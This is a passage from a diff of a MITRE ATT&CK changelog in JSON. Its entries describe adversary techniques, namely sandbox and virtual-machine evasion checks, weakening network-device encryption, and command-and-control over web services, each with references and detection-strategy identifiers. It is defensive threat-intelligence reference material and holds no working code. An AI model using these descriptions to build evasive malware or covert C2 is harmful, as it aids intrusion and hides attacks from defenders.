+                    "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1497",
+                            "external_id": "T1497"
+                        },
+                        {
+                            "source_name": "Unit 42 Pirpi July 2015",
+                            "description": "Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"
+                        },
+                        {
+                            "source_name": "Deloitte Environment Awareness",
+                            "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved September 13, 2024.",
+                            "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Deloitte Threat Library Team",
+                        "Sunny Neo"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.672000+00:00\", \"old_value\": \"2026-04-15 22:52:12.932000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0046: Detection Strategy for T1497 Virtualization/Sandbox Evasion"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-06 20:57:37.959000+00:00",
+                    "modified": "2026-05-12 15:12:00.623000+00:00",
+                    "name": "System Checks",
+                    "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1497/001",
+                            "external_id": "T1497.001"
+                        },
+                        {
+                            "source_name": "Unit 42 OilRig Sept 2018",
+                            "description": "Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/"
+                        },
+                        {
+                            "source_name": "McAfee Virtual Jan 2017",
+                            "description": "Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.",
+                            "url": "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/"
+                        },
+                        {
+                            "source_name": "Deloitte Environment Awareness",
+                            "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved September 13, 2024.",
+                            "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Deloitte Threat Library Team",
+                        "Kostya Vasilkov"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.623000+00:00\", \"old_value\": \"2026-04-15 22:51:53.404000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0168: Virtualization/Sandbox Evasion via System Checks across Windows, Linux, macOS"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-06 21:11:11.225000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "Time Based Checks",
+                    "description": "Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. This may include enumerating time-based properties, such as uptime or the system clock. \n\nAdversaries may use calls like `GetTickCount` and `GetSystemTimeAsFileTime` to discover if they are operating within a virtual machine or sandbox, or may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1497/003",
+                            "external_id": "T1497.003"
+                        },
+                        {
+                            "source_name": "ISACA Malware Tricks",
+                            "description": "Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.",
+                            "url": "https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Deloitte Threat Library Team",
+                        "Jeff Felling, Red Canary",
+                        "Jorge Orchilles, SCYTHE",
+                        "Ruben Dodge, @shotgunner101"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2026-04-15 22:52:39.442000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0141: Detect Time-Based Evasion via Sleep, Timer Loops, and Delayed Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-06 21:04:12.454000+00:00",
+                    "modified": "2026-05-12 15:12:00.705000+00:00",
+                    "name": "User Activity Based Checks",
+                    "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1497/002",
+                            "external_id": "T1497.002"
+                        },
+                        {
+                            "source_name": "FireEye FIN7 April 2017",
+                            "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
+                        },
+                        {
+                            "source_name": "Unit 42 Sofacy Nov 2018",
+                            "description": "Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. Retrieved April 23, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"
+                        },
+                        {
+                            "source_name": "Sans Virtual Jan 2016",
+                            "description": "Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.",
+                            "url": "https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667"
+                        },
+                        {
+                            "source_name": "Deloitte Environment Awareness",
+                            "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved September 13, 2024.",
+                            "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Deloitte Threat Library Team"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2026-04-15 22:52:22.149000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0420: Detect User Activity Based Sandbox Evasion via Input & Artifact Probing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 18:47:08.759000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Weaken Encryption",
+                    "description": "Adversaries may compromise a network device\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications.(Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts.(Citation: Cisco Blog Legacy Device Attacks)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1600",
+                            "external_id": "T1600"
+                        },
+                        {
+                            "source_name": "Cisco Synful Knock Evolution",
+                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
+                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2026-04-16 20:07:53.046000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0339: Detection Strategy for Weaken Encryption on Network Devices"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 19:11:18.757000+00:00",
+                    "modified": "2026-05-12 15:12:00.662000+00:00",
+                    "name": "Disable Crypto Hardware",
+                    "description": "Adversaries disable a network device\u2019s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1600/002",
+                            "external_id": "T1600.002"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.662000+00:00\", \"old_value\": \"2026-04-16 20:07:53.028000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0494: Detection Strategy for Weaken Encryption: Disable Crypto Hardware on Network Devices"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 19:03:48.310000+00:00",
+                    "modified": "2026-05-12 15:12:00.627000+00:00",
+                    "name": "Reduce Key Space",
+                    "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1600/001",
+                            "external_id": "T1600.001"
+                        },
+                        {
+                            "source_name": "Cisco Synful Knock Evolution",
+                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
+                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.627000+00:00\", \"old_value\": \"2026-04-16 20:07:53.005000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0243: Detection Strategy for Weaken Encryption: Reduce Key Space on Network Devices"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:13.915000+00:00",
+                    "modified": "2026-05-12 15:12:00.672000+00:00",
+                    "name": "Web Service",
+                    "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1102",
+                            "external_id": "T1102"
+                        },
+                        {
+                            "source_name": "Broadcom BirdyClient Microsoft Graph API 2024",
+                            "description": "Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft Graph API for C&C communication. Retrieved July 1, 2024.",
+                            "url": "https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Anastasios Pingios",
+                        "Sarathkumar Rajendran, Microsoft Defender365"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.672000+00:00\", \"old_value\": \"2025-10-24 17:49:02.831000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1031: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0425: Suspicious Use of Web Services for C2"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-14 22:34:03.024000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Bidirectional Communication",
+                    "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1102/002",
+                            "external_id": "T1102.002"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
